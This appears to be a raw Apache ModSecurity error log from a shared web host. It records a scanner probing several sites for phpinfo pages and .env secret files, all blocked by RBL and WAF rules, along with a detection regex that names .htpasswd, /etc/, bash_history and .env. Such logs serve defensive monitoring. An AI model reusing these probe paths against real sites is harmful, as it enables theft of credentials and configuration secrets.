[Tue May 26 13:04:03.868016 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BAgAAACM"]
[Tue May 26 13:04:03.900919 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BFQAAABM"]
[Tue May 26 13:04:03.908534 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BFgAAAEs"]
[Tue May 26 13:04:03.912188 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BFwAAABY"]
[Tue May 26 13:04:03.913311 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BGAAAAFY"]
[Tue May 26 13:04:03.915735 2026] [security2:error] [pid 470766:tid 470909] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BGQAAAA0"]
[Tue May 26 13:04:03.917194 2026] [security2:error] [pid 470766:tid 470986] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BGwAAAFo"]
[Tue May 26 13:04:03.920505 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BGgAAAG8"]
[Tue May 26 13:04:04.006568 2026] [security2:error] [pid 470766:tid 470900] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BKwAAAAQ"]
[Tue May 26 13:04:04.006973 2026] [security2:error] [pid 470766:tid 470930] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BLQAAACI"]
[Tue May 26 13:04:04.008206 2026] [security2:error] [pid 470766:tid 470920] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BLAAAABg"]
[Tue May 26 13:04:04.046955 2026] [security2:error] [pid 470766:tid 471008] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BNQAAcE0"]
[Tue May 26 13:04:04.048188 2026] [security2:error] [pid 470766:tid 470879] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/php-info.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BQQAAcHA"]
[Tue May 26 13:04:04.055917 2026] [security2:error] [pid 470766:tid 470862] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/php.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BQgAAcF8"]
[Tue May 26 13:04:04.057277 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BPQAAAEI"]
[Tue May 26 13:04:04.061460 2026] [security2:error] [pid 470766:tid 470953] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BOgAAADk"]
[Tue May 26 13:04:04.061664 2026] [security2:error] [pid 470766:tid 470990] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BPgAAAF4"]
[Tue May 26 13:04:04.064142 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BOQAAAFI"]
[Tue May 26 13:04:04.069928 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BPAAAAEo"]
[Tue May 26 13:04:04.070223 2026] [security2:error] [pid 470766:tid 470807] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/php_info.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BRAAAcCg"]
[Tue May 26 13:04:04.070650 2026] [security2:error] [pid 470766:tid 470892] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/phpinfo.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BRgAAcH0"]
[Tue May 26 13:04:04.073021 2026] [security2:error] [pid 470766:tid 470806] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/portal/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BSAAAcCc"]
[Tue May 26 13:04:04.111697 2026] [security2:error] [pid 470766:tid 471008] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BRwAAcHE"]
[Tue May 26 13:04:04.115528 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BSwAAADI"]
[Tue May 26 13:04:04.127266 2026] [core:crit] [pid 470766:tid 470943] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:04:04.164938 2026] [security2:error] [pid 470766:tid 470890] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/prod/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BUgAACns"]
[Tue May 26 13:04:04.193569 2026] [security2:error] [pid 470766:tid 470823] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/product/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BWAAACjg"]
[Tue May 26 13:04:04.204111 2026] [security2:error] [pid 470766:tid 470825] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/production/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BWQAACjo"]
[Tue May 26 13:04:04.207924 2026] [security2:error] [pid 470766:tid 470886] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/project/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BXQAACnc"]
[Tue May 26 13:04:04.218181 2026] [security2:error] [pid 470766:tid 470824] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/public/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BYwAACjk"]
[Tue May 26 13:04:04.218296 2026] [security2:error] [pid 470766:tid 470811] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/public-api/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BYgAACiw"]
[Tue May 26 13:04:04.218889 2026] [security2:error] [pid 470766:tid 470840] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/public/phpinfo.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BZgAACkk"]
[Tue May 26 13:04:04.221561 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BVQAAACo"]
[Tue May 26 13:04:04.223517 2026] [security2:error] [pid 470766:tid 470906] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BVwAACn8"]
[Tue May 26 13:04:04.228211 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BVgAAAGY"]
[Tue May 26 13:04:04.244757 2026] [security2:error] [pid 470766:tid 470937] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BYAAAACk"]
[Tue May 26 13:04:04.249830 2026] [security2:error] [pid 470766:tid 470906] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BZQAACjc"]
[Tue May 26 13:04:04.253407 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BZwAAACw"]
[Tue May 26 13:04:04.253517 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BZAAAAHc"]
[Tue May 26 13:04:04.253525 2026] [security2:error] [pid 470766:tid 470855] [remote 185.177.72.30:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/register.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BawAAJ1g"]
[Tue May 26 13:04:04.257607 2026] [security2:error] [pid 470766:tid 470841] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/public_html/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BbAAAf0o"]
[Tue May 26 13:04:04.310602 2026] [security2:error] [pid 470766:tid 470994] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BbwAAAGI"]
[Tue May 26 13:04:04.311709 2026] [security2:error] [pid 470766:tid 470843] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/qa/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4BcAAAX0w"]
[Tue May 26 13:04:04.393497 2026] [security2:error] [pid 470766:tid 470949] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BdAAAADU"]
[Tue May 26 13:04:04.396879 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BeQAAADY"]
[Tue May 26 13:04:04.405804 2026] [security2:error] [pid 470766:tid 470963] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BeAAAAEM"]
[Tue May 26 13:04:04.422952 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BhQAAAAE"]
[Tue May 26 13:04:04.423092 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BhwAAAEc"]
[Tue May 26 13:04:04.426866 2026] [security2:error] [pid 470766:tid 470988] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BiwAAAFw"]
[Tue May 26 13:04:04.428614 2026] [security2:error] [pid 470766:tid 470945] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BgwAAADE"]
[Tue May 26 13:04:04.436277 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BigAAAAw"]
[Tue May 26 13:04:04.441762 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BmAAAAFE"]
[Tue May 26 13:04:04.445791 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BlwAAAEg"]
[Tue May 26 13:04:04.446760 2026] [security2:error] [pid 470766:tid 470936] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BjAAAACg"]
[Tue May 26 13:04:04.451870 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BlgAAAGM"]
[Tue May 26 13:04:04.460275 2026] [security2:error] [pid 470766:tid 470928] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BmwAAACA"]
[Tue May 26 13:04:04.477792 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BngAAAFU"]
[Tue May 26 13:04:04.503099 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BqAAAAGQ"]
[Tue May 26 13:04:04.512338 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BpwAAACM"]
[Tue May 26 13:04:04.526724 2026] [security2:error] [pid 470766:tid 470933] [client 157.20.138.61:63632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BrQAAACU"]
[Tue May 26 13:04:04.526839 2026] [security2:error] [pid 470766:tid 470933] [client 157.20.138.61:63632] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BrQAAACU"]
[Tue May 26 13:04:04.577613 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BsAAAACw"]
[Tue May 26 13:04:04.599802 2026] [security2:error] [pid 470766:tid 471017] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BtgAAAHk"]
[Tue May 26 13:04:04.601606 2026] [security2:error] [pid 470766:tid 470956] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BtQAAADw"]
